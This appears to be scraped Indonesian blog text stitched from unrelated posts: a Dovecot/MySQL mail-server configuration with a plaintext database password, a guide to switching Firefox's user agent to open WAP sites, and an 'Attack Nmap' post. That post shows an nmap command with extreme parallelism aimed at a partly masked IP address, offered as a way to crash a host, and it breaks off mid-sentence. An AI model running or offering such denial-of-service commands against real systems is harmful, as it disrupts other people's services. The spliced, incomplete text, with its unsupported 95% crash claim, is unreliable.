   default_mail_env = maildir:/home/vmail/%u/
   first_valid_uid = 5000
   first_valid_gid = 5000
   # SQL database
    passdb sql {
   # Path for SQL configuration file
   args = /etc/dovecot/dovecot-sql.conf
   }
   # SQL database
   userdb sql {
   # Path for SQL configuration file
   args = /etc/dovecot/dovecot-sql.conf
   }

nano /etc/dovecot/dovecot-sql.conf
   driver = mysql
   connect = host=127.0.0.1 dbname=postfix user=postfix password=postfixpassword
   default_pass_scheme = CRYPT
   user_query = SELECT maildir, 5000 AS uid, 5000 AS gid FROM mailbox WHERE username = '%u'
   password_query = SELECT password FROM mailbox WHERE username = '%u'

Merubah Browser Agent Pada Firefox

tau situs wap kan itu loch situs yang hanya bisa dibuka lewat ponsel kaya situs peperonity.com, waptrik.com..langsung aja ya


1. langkah pertama

install Add-On User Agent Switcher

2. langkah kedua

download file ini user_agents, extract

3.langkah ketiga

buka firefox pilih Tools -> Default User Agents -> Edit User Agents
klik import, trus pilih file useragentswitcher.xml, klik ok

4.langkah keempat

pilih Tools -> Default User Agents -> Nokia 5800 / operamini
masuk ke situs waptrik.com

5. langkah kelima

kalau berhasil kebuka situsnya berarti berhasil…

situs wap kalau dibuka dipc bakal jadi kecil ukurannya

dicoba yah…

Attack Nmap

Nmap adalah sebuah tool pemeta jaringan yang banyak di pakai oleh hacker. Banyak metode scanning yang bisa dilakukan oleh nmap dan salah satunya adalah -sT scanning.

Hal lain yang dapat kamu lakukan dengan -sT scanning adalah DoS (Denial of Service) sebuah Host.
seperti contoh dibawah ini….. (don’t blame me for this…..!!)

1. zer03s# nmap -T 5 -M 1000 -sT 203.130.254.xx

Warning: Your max_parallelism (-M) option is absurdly high! Don’t complain to Fyodor if all hell breaks loose!berhubung target tujuan sudah memakai Stack-Guard (maka tidak terjadi kerusakan), tapi apabila anda melakukan ini ke Host yang running W*ndows XP kemungkinan 95% akan mengalami Crash.bila kamu perhatikan bahwa aku memberi nmap -T 5 -M 1000,”Flag” -M adalah “Flag” untuk menggunakan jumlah maksimal “socket” yang digunakan oleh Nmap dan 60 “Socket” sudah bisa dikategorikan banyak (dan diatas ane memakai 1000 !! tapi itu sudah sangat efektif